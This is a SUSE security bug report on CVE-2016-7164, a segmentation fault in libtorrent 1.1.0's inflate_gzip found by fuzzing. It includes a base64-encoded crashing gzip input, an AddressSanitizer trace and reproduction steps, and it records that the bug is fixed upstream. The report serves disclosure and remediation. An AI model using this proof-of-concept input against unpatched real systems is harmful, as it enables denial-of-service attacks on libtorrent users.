997820 – (CVE-2016-7164) VUL-0: CVE-2016-7164: libtorrent: inflate_gzip denial of service

Bug 997820 (CVE-2016-7164) - VUL-0: CVE-2016-7164: libtorrent: inflate_gzip denial of service

Summary: VUL-0: CVE-2016-7164: libtorrent: inflate_gzip denial of service

Status:	RESOLVED FIXED

Alias:	CVE-2016-7164

Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	Incidents (show other bugs)
Version:	unspecified
Hardware:	Other openSUSE 42.1

Priority:	P3 - Medium Severity: Normal
Target Milestone:	---
Assignee:	Alexei Sorokin
QA Contact:	Security Team bot

URL:	https://smash.suse.de/issue/172440/
Whiteboard:
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2016-09-08 07:27 UTC by Victor Pereira
Modified:	2017-03-07 12:50 UTC (History)
CC List:	1 user (show)

See Also:
Found By:	Security Response Team
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
PoC (1.53 KB, text/plain) 2016-09-08 07:27 UTC, Victor Pereira	Details
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Victor Pereira 2016-09-08 07:27:49 UTC

Created attachment 691332 [details]
PoC

CVE-2016-7164

libtorrent version (or branch): 1.1.0.0


The issue was found with "afl fuzzer" while executing a modified version of the "test_gzip" testsuite with the following input data(displayed in base64 format):

H4sIAAjjYGJiWXWAAAAAYFlZWVlZWV34+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4AP4I
DAgLy5kMWQP/YmIA/wUAmQxZBf9iYgD/BQD/ALy8IAAAl5eXl5eXl5eXl5eXl5eXAABZWVlZWVlZ
Xfj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+PgA/ggMCAvLmQxZA/9iYgD/BQCZDFkF/2Ji
AP8FAP8AvLwgAACXl5eXl5eXl5eXl5eXl5cAAFlZWVlZWVlZAPoIDAgLy5kMWQX/YmIA/wUAWVlZ
WVlZWVlZAID//1lZWVlZWVkA+ggMCAvLmQxZBf9iYgD/BQBZWVlZWVlZWVkAgP//YmJiEARkQPZZ
WVlZWQwMDIsIAEQ=
A segmentation fault signal was captured while running:
./test_gzip gzip_data
The output from ASAN:

ASAN:SIGSEGV
=================================================================
==28954==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000048cb19 sp 0x7ffe24a458b0 bp 0x000000000000 T0)
    #0 0x48cb18 in construct(huffman*, short*, int) /home/user/libtorrent-rasterbar-1.1.0/src/puff.cpp:365
    #1 0x494c77 in dynamic /home/user/libtorrent-rasterbar-1.1.0/src/puff.cpp:693
    #2 0x494c77 in puff(unsigned char*, unsigned int*, unsigned char const*, unsigned int*) /home/user/libtorrent-rasterbar-1.1.0/src/puff.cpp:781
    #3 0x489f71 in libtorrent::inflate_gzip(char const*, int, std::vector<char, std::allocator<char> >&, int, boost::system::error_code&) /home/user/libtorrent-rasterbar-1.1.0/src/gzip.cpp:230
    #4 0x482aed in main /home/user/libtorrent-rasterbar-1.1.0/examples3/test_gzip.cpp:84
    #5 0x7f8f1ede1f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    #6 0x48025c in _start (/tmp/fuzz_gzip/test_gzip+0x48025c)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/user/libtorrent-rasterbar-1.1.0/src/puff.cpp:365 construct(huffman*, short*, int)
==28954==ABORTING
The issue seems to be located in the puff.cpp file inside the "construct" function.

To reproduce:
1.compile "test_gzip.cpp" (here attached)
2.copy the base64 encoded data to a file (ex. gzip_data.b64)
3.decode the file to a new file ("base64 -d gzip_data.b64 > gzip_data") 
3.run ./test_gzip gzip_data


References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7164
http://seclists.org/oss-sec/2016/q3/443

Comment 1 Victor Pereira 2016-09-08 07:28:43 UTC

full discussion and patch proposal: 

https://github.com/arvidn/libtorrent/issues/1021
https://github.com/arvidn/libtorrent/pull/1022

Comment 2 Swamp Workflow Management 2016-09-08 22:00:15 UTC

bugbot adjusting priority

Comment 3 Jan Engelhardt 2016-09-17 20:45:08 UTC

I am not the maintainer for arvidn-libtorrent.

Comment 4 Alexei Sorokin 2017-03-07 12:50:01 UTC

That was fixed.